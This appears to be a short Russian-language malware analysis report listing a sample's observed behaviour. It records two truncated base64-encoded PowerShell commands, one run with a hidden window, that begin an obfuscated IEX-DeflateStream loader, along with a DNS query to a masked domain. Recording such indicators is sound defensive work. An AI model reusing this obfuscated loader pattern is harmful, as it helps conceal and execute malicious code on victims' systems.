Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e aQBFAFgAIAAoAE4ARQB3AC0ATwBiAGoARQBjAFQAIAAgAHMAeQBzAHQAZQBNAC4ASQBPAC4AYwBPAE0AUAByAEUAcwBTAGkATwBOAC4AZABlAEYATABBAFQARQBTAFQAcgBFAEEATQAoAFsAUwB5AFMAdABlAG0ALgBpAE8ALgBNAGUAbQBvAFIAeQBTAF...
- DNS ASK zz###wnewq.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e aQBFAFgAIAAoAE4ARQB3AC0ATwBiAGoARQBjAFQAIAAgAHMAeQBzAHQAZQBNAC4ASQBPAC4AYwBPAE0AUAByAEUAcwBTAGkATwBOAC4AZABlAEYATABBAFQARQBTAFQAcgBFAEEATQAoAFsAUwB5AFMAdABlAG0ALgBpAE8ALgBNAGUAbQBvAFIAeQBTAF...' (со скрытым окном)